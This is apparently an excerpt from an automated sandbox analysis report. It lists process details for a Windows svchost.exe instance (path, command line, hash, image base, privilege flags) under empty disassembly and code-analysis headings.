                                                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:11:03:16
                                                                                                                                                                                                                  Start date:22/11/2021
                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                                                                  Imagebase:0x7ff797770000
                                                                                                                                                                                                                  File size:51288 bytes
                                                                                                                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                                                  Disassembly

                                                                                                                                                                                                                  Code Analysis

                                                                                                                                                                                                                  Reset < >